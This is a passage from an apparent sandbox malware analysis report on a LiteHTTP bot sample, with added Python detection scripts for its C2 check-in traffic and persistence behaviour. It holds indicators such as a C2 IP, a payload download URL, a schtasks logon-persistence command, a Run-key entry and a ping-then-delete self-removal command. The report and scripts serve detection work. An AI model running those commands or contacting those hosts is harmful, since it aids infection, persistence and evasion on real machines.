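    if IPV4_HOST.match(hdr.get("host", "")):
        tags.append("ip_literal_host")          # pairs with "TCP traffic without DNS query"
    if req["method"] == "POST" and hdr.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        keys = {k for k, _ in parse_qsl(req["body"].decode("latin-1"), keep_blank_values=True)}
        if len(keys & CNC_KEYS) >= 6:           # threshold is an assumption; the sample sends all ten
            tags.append("litehttp_checkin_form")
    return tags


def build(method, path, headers, body=b""):
    """Assemble a raw request; Content-Length is derived from the body."""
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers]
    if body:
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


# Constructed samples (see lead-in).
CHECKIN_BODY = "&".join(f"{k}=x" for k in sorted(CNC_KEYS)).encode()
CHECKIN = build("POST", "/VmCetSC7/page.php", [
    ("Content-Type", "application/x-www-form-urlencoded"),
    ("User-Agent", "E9BC3BD76216AFA560BFB5ACAF5731A3"),
    ("Host", "87.120.126.5"),
    ("Expect", "100-continue"),
    ("Connection", "Keep-Alive"),
], CHECKIN_BODY)
STAGE_DOWNLOAD = build("GET", "/dl/19480319/anubis.exe", [("Host", "tmpfiles.org"), ("Connection", "Keep-Alive")])
BENIGN = build("GET", "/index.html", [("Host", "www.example.com"),
                                      ("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)")])

if __name__ == "__main__":
    for name, raw in (("check-in", CHECKIN), ("stage download", STAGE_DOWNLOAD), ("benign", BENIGN)):
        print(f"{name}: {classify(raw)}")
```

Any one of these traits is weak on its own (plenty of software talks to IP literals, and some omit a User-Agent); the point of the example is that the check-in trips all four at once, which is the combination the ETPRO signatures above key on. The exact User-Agent value is the most brittle indicator and the form-key set the most durable, since the latter comes from strings compiled into every dropped copy.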

                    Operating System Destruction

Source: C:\Users\user\Desktop\random.exe | Process information set: 01 00 00 00 (BreakOnTermination enabled, see the signature "Protects its processes via BreakOnTermination flag": killing the process then triggers a system crash)

                    System Summary

                    barindex
                    Source: random.exe, type: SAMPLEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: 1.0.random.exe.cf0000.0.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\jdownloader.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows multimedia platform.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\autoit3.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windowspowershell.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\reference assemblies.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows mail.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\common files.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\microsoft.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows defender.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows sidebar.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows photo viewer.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\msecache.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\java.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\internet explorer.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows nt.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\random.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\microsoft.net.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows media player.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\google.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\microsoft office.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows portable devices.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\msbuild.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_015130101_2_01513010
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_015113901_2_01511390
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_0151E9701_2_0151E970
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_055375D81_2_055375D8
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_0553F6981_2_0553F698
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_055388281_2_05538828
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_055312981_2_05531298
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_05531AB81_2_05531AB8
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_05531AA91_2_05531AA9
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B512781_2_06B51278
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B547881_2_06B54788
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B539181_2_06B53918
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B534DF1_2_06B534DF
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B500401_2_06B50040
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B535501_2_06B53550
                    Source: random.exe, 00000001.00000002.2007218382.00000000012EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs random.exe
                    Source: random.exe, 00000001.00000002.2010343903.00000000069B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exe, 00000001.00000000.1340305502.0000000000CFC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exe, 00000001.00000002.2007218382.0000000001344000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exe, 00000001.00000002.2008201035.000000000338F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exe | Binary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exe.1.dr | Binary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Matched rule: MALWARE_Win_CoreBot (author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212) on the following sources:
                        random.exe (type: SAMPLE)
                        1.0.random.exe.cf0000.0.unpack (type: UNPACKEDPE)
                        C:\Users\user\OneDrive\jdownloader.exe (type: DROPPED)
                        C:\Users\user\OneDrive\windows multimedia platform.exe (type: DROPPED)
                        C:\Users\user\OneDrive\autoit3.exe (type: DROPPED)
                        C:\Users\user\OneDrive\windowspowershell.exe (type: DROPPED)
                        C:\Users\user\OneDrive\reference assemblies.exe (type: DROPPED)
                        C:\Users\user\OneDrive\windows mail.exe (type: DROPPED)
                        C:\Users\user\OneDrive\common files.exe (type: DROPPED)
                        C:\Users\user\OneDrive\microsoft.exe (type: DROPPED)
                        C:\Users\user\OneDrive\windows defender.exe (type: DROPPED)
                        C:\Users\user\OneDrive\windows sidebar.exe (type: DROPPED)
                        C:\Users\user\OneDrive\windows photo viewer.exe (type: DROPPED)
                        C:\Users\user\OneDrive\msecache.exe (type: DROPPED)
                        C:\Users\user\OneDrive\java.exe (type: DROPPED)
                        C:\Users\user\OneDrive\internet explorer.exe (type: DROPPED)
                        C:\Users\user\OneDrive\mozilla maintenance service.exe (type: DROPPED)
                        C:\Users\user\OneDrive\windows nt.exe (type: DROPPED)
                        C:\Users\user\AppData\Roaming\random.exe (type: DROPPED)
                        C:\Users\user\OneDrive\microsoft.net.exe (type: DROPPED)
                        C:\Users\user\OneDrive\windows media player.exe (type: DROPPED)
                        C:\Users\user\OneDrive\google.exe (type: DROPPED)
                        C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe (type: DROPPED)
                        C:\Users\user\OneDrive\microsoft office.exe (type: DROPPED)
                        C:\Users\user\OneDrive\windows portable devices.exe (type: DROPPED)
                        C:\Users\user\OneDrive\msbuild.exe (type: DROPPED)
                    Note: the matching rule is named for CoreBot, while the report classifies the sample as LiteHTTP Bot and the embedded PDB path (...\Bot\LiteHTTP\obj\Debug\Anubis.pdb) agrees with that classification. Treat the rule hit as a detection signal, not as a family attribution; the family label here rests on the report's own classification and the PDB path.
                    Source: classification engine | Classification label: mal100.troj.evad.winEXE@14/52@1/2
                    Source: C:\Users\user\Desktop\random.exe | File created: C:\Users\user\AppData\Roaming\random.exe
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1096:120:WilError_03
                    Source: random.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: random.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\random.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (3 identical entries)
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\random.exe | File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\random.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: random.exe | ReversingLabs: Detection: 21%
                    Source: random.exe | Virustotal: Detection: 31%
                    Source: C:\Users\user\Desktop\random.exe | File read: C:\Users\user\Desktop\random.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
                    Source: C:\Users\user\Desktop\random.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Users\user\Desktop\random.exe C:\Users\user\Desktop\random.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
                    Source: unknown | Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
                    Source: C:\Users\user\Desktop\random.exe | Process created: C:\Users\user\AppData\Roaming\cEp3d38.exe "C:\Users\user\AppData\Roaming\cEp3d38.exe"
                    Source: C:\Users\user\Desktop\random.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                    Source: C:\Users\user\Desktop\random.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, ntmarta.dll, sxs.dll, uxtheme.dll, mpr.dll, scrrun.dll, propsys.dll, linkinfo.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, wbemcomn.dll, amsi.dll, userenv.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, netutils.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Sections loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
                    Source: C:\Users\user\Desktop\random.exe (second instance) | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\random.exe (third instance) | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\random.exe (fourth instance) | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\PING.EXE | Sections loaded: iphlpapi.dll, winnsi.dll, mswsock.dll
                    Source: C:\Users\user\Desktop\random.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
                    Source: random.lnk.1.dr | LNK file: ..\..\..\..\..\..\..\Desktop\random.exe
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: random.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: random.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: random.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.7\Bot\LiteHTTP\obj\Debug\Anubis.pdb source: random.exe, windows photo viewer.exe.1.dr, windows nt.exe.1.dr, windows sidebar.exe.1.dr, random.exe.1.dr, microsoft.exe.1.dr, autoit3.exe.1.dr, java.exe.1.dr, windows mail.exe.1.dr, windowspowershell.exe.1.dr, jdownloader.exe.1.dr, internet explorer.exe.1.dr, msecache.exe.1.dr, common files.exe.1.dr, windows multimedia platform.exe.1.dr, mozilla maintenance service.exe.1.dr, windows defender.exe.1.dr, reference assemblies.exe.1.dr, windows media player.exe.1.dr, microsoft.net.exe.1.dr, mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe.1.dr, cEp3d38.exe.1.dr, google.exe.1.dr, microsoft office.exe.1.dr, msbuild.exe.1.dr, windows portable devices.exe.1.dr
                    Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.7\Bot\LiteHTTP\obj\Debug\Anubis.pdbd source: random.exe, windows photo viewer.exe.1.dr, windows nt.exe.1.dr, windows sidebar.exe.1.dr, random.exe.1.dr, microsoft.exe.1.dr, autoit3.exe.1.dr, java.exe.1.dr, windows mail.exe.1.dr, windowspowershell.exe.1.dr, jdownloader.exe.1.dr, internet explorer.exe.1.dr, msecache.exe.1.dr, common files.exe.1.dr, windows multimedia platform.exe.1.dr, mozilla maintenance service.exe.1.dr, windows defender.exe.1.dr, reference assemblies.exe.1.dr, windows media player.exe.1.dr, microsoft.net.exe.1.dr, mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe.1.dr, cEp3d38.exe.1.dr, google.exe.1.dr, microsoft office.exe.1.dr, msbuild.exe.1.dr, windows portable devices.exe.1.dr
                    Source: C:\Users\user\Desktop\random.exe | Code function: 1_2_01517300 pushfd ; retn 0147h (at 1_2_01517379)
                    Source: C:\Users\user\Desktop\random.exe | Code function: 1_2_01518C80 push eax; ret (at 1_2_01518E17)
                    Source: C:\Users\user\Desktop\random.exe | Files created (dropped files):
                        C:\Users\user\OneDrive\common files.exe
                        C:\Users\user\OneDrive\mozilla maintenance service.exe
                        C:\Users\user\OneDrive\windows mail.exe
                        C:\Users\user\OneDrive\windows sidebar.exe
                        C:\Users\user\AppData\Roaming\random.exe
                        C:\Users\user\OneDrive\windows nt.exe
                        C:\Users\user\OneDrive\windows media player.exe
                        C:\Users\user\OneDrive\reference assemblies.exe
                        C:\Users\user\OneDrive\windows multimedia platform.exe
                        C:\Users\user\OneDrive\java.exe
                        C:\Users\user\AppData\Roaming\cEp3d38.exe
                        C:\Users\user\OneDrive\jdownloader.exe
                        C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe
                        C:\Users\user\OneDrive\autoit3.exe
                        C:\Users\user\OneDrive\windows portable devices.exe
                        C:\Users\user\OneDrive\msecache.exe
                        C:\Users\user\OneDrive\windowspowershell.exe
                        C:\Users\user\OneDrive\microsoft.net.exe
                        C:\Users\user\OneDrive\windows photo viewer.exe
                        C:\Users\user\OneDrive\microsoft office.exe
                        C:\Users\user\OneDrive\windows defender.exe
                        C:\Users\user\OneDrive\microsoft.exe
                        C:\Users\user\OneDrive\google.exe
                        C:\Users\user\OneDrive\internet explorer.exe
                        C:\Users\user\OneDrive\msbuild.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\random.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F
                    Source: C:\Users\user\Desktop\random.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\random.lnk
                    Source: C:\Users\user\Desktop\random.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run TaskHelper
                    Note: the scheduled task and the Startup shortcut (random.lnk, which resolves to ..\Desktop\random.exe) both point at C:\Users\user\Desktop\random.exe, the file the sample deletes through cmd.exe in the next section; the same name, TaskHelper, is reused for the task and the Run value, and the Run value lands under WOW6432Node because the 32-bit process wrote to HKLM through the WOW64 registry redirector.

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\random.exe | Process created: "cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"
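                    The following triage script is an added example and is not part of the Joe Sandbox report nor code from the LiteHTTP bot. It turns the Boot Survival entries and the self-deletion entry above into detection rules: the command lines, the dropped-file paths and the Run value name are copied verbatim from this report, the Program Files directory-name list and the two regular expressions are the example's own heuristics (the observation that the dropped names mirror folders found under C:\Program Files is the editor's reading, not something the report states), and the one path under C:\Program Files is a constructed benign control.

```python
"""Triage rules for the behaviours this report lists for random.exe.

Added example; not part of the Joe Sandbox report and not LiteHTTP code.
The command lines, dropped-file paths and Run value name are copied from
the report's "Process created", "File created" and "Registry value" entries.
The regexes and the Program Files name list are this example's own heuristics.
"""
import re
from dataclasses import dataclass

# From the report's "Process created" entries (verbatim).
COMMAND_LINES = [
    r'"schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F',
    r'"cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"',
    r"ping 1.1.1.1 -n 1 -w 4000",
    r'"C:\Users\user\AppData\Roaming\cEp3d38.exe"',
]

# From the report's "File created" entries, plus one constructed benign path.
DROPPED_FILES = [
    r"C:\Users\user\OneDrive\common files.exe",
    r"C:\Users\user\OneDrive\windows defender.exe",
    r"C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe",
    r"C:\Users\user\AppData\Roaming\cEp3d38.exe",
    r"C:\Program Files\Windows Defender\MsMpEng.exe",  # constructed, benign control
]

# From the report's "Registry value created or modified" entry.
RUN_VALUES = {"TaskHelper": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run"}

# Self-deletion: a process cannot unlink its own running image, so the bot
# spawns cmd.exe, which sleeps via ping/timeout and then deletes the file.
SELF_DELETE_RE = re.compile(
    r'(?i)\b(?P<sleeper>ping|timeout)\b[^&]*&\s*(?:del|erase)\b\s+"?(?P<target>[^"]+\.exe)"?'
)

# schtasks persistence with a logon/boot/recurring trigger; /F overwrites silently.
SCHTASKS_RE = re.compile(
    r'(?i)schtasks(?:\.exe)?"?\s+/create\b.*?/sc\s+(?P<trigger>onlogon|onstart|onidle|minute|hourly|daily)\b'
    r'.*?/tn\s+"?(?P<name>[^"\s]+)"?.*?/tr\s+"?(?P<target>[^"]+?)"?(?:\s+/|$)'
)

# Directory names commonly present under C:\Program Files; the dropper reuses
# them as .exe names inside the user's OneDrive folder (example's own list).
PROGRAM_FILES_NAMES = {
    "common files", "internet explorer", "windows defender", "windows mail",
    "windows media player", "windows multimedia platform", "windows nt",
    "windows photo viewer", "windows portable devices", "windows sidebar",
    "windowspowershell", "reference assemblies", "msbuild", "microsoft office",
    "mozilla maintenance service", "google", "java", "microsoft.net",
}


@dataclass(frozen=True)
class Finding:
    rule: str
    target: str
    detail: str = ""


def triage_command_line(cmd: str) -> list[Finding]:
    """Apply the self-deletion and schtasks rules to one process command line."""
    findings = []
    m = SELF_DELETE_RE.search(cmd)
    if m:
        findings.append(Finding("self_delete_via_cmd", m["target"], f"sleep via {m['sleeper'].lower()}"))
    m = SCHTASKS_RE.search(cmd)
    if m:
        findings.append(Finding("schtasks_persistence", m["target"], f"{m['name']}@{m['trigger'].upper()}"))
    return findings


def masquerading_drops(paths) -> list[str]:
    """Executables under C:\\Users whose file name is a Program Files folder name."""
    hits = []
    for p in paths:
        base = p.rsplit("\\", 1)[-1].lower()
        stem = base[:-4] if base.endswith(".exe") else base
        if p.lower().startswith("c:\\users\\") and stem in PROGRAM_FILES_NAMES:
            hits.append(p)
    return hits


def triage_report(command_lines=COMMAND_LINES, dropped=DROPPED_FILES) -> list[Finding]:
    """Run every rule over the report's entries and return all findings in order."""
    findings = [f for c in command_lines for f in triage_command_line(c)]
    findings += [Finding("masquerading_drop", p, "Program Files name under user profile")
                 for p in masquerading_drops(dropped)]
    return findings


def shared_persistence_names(findings, run_values=RUN_VALUES) -> set[str]:
    """Names used both as a scheduled-task name and as a Run value name; one
    label across two persistence mechanisms points at a single installer."""
    task_names = {f.detail.split("@", 1)[0] for f in findings if f.rule == "schtasks_persistence"}
    return task_names & set(run_values)


if __name__ == "__main__":
    found = triage_report()
    for f in found:
        print(f"{f.rule:22} {f.target}  ({f.detail})")
    print("shared persistence names:", sorted(shared_persistence_names(found)))
```

                    Run as-is it flags the schtasks ONLOGON task, the ping-then-Del self-deletion, the two OneDrive drops whose names mimic Program Files folders, and reports TaskHelper as the name shared by the task and the Run value; the standalone ping child and the constructed MsMpEng.exe path produce nothing. The same functions can be pointed at Sysmon event 1 command lines and event 11 file paths from a live host instead of the lists embedded here.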
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\random.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: 1510000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: 3090000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: 16B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: 1160000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: 2EA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: 12D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: A40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: 2360000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: 4360000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: B30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: 2680000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Memory allocated: CA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Memory allocated: 7F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Memory allocated: 2430000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Memory allocated: 2380000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\random.exe | Window / User API: threadDelayed 2543
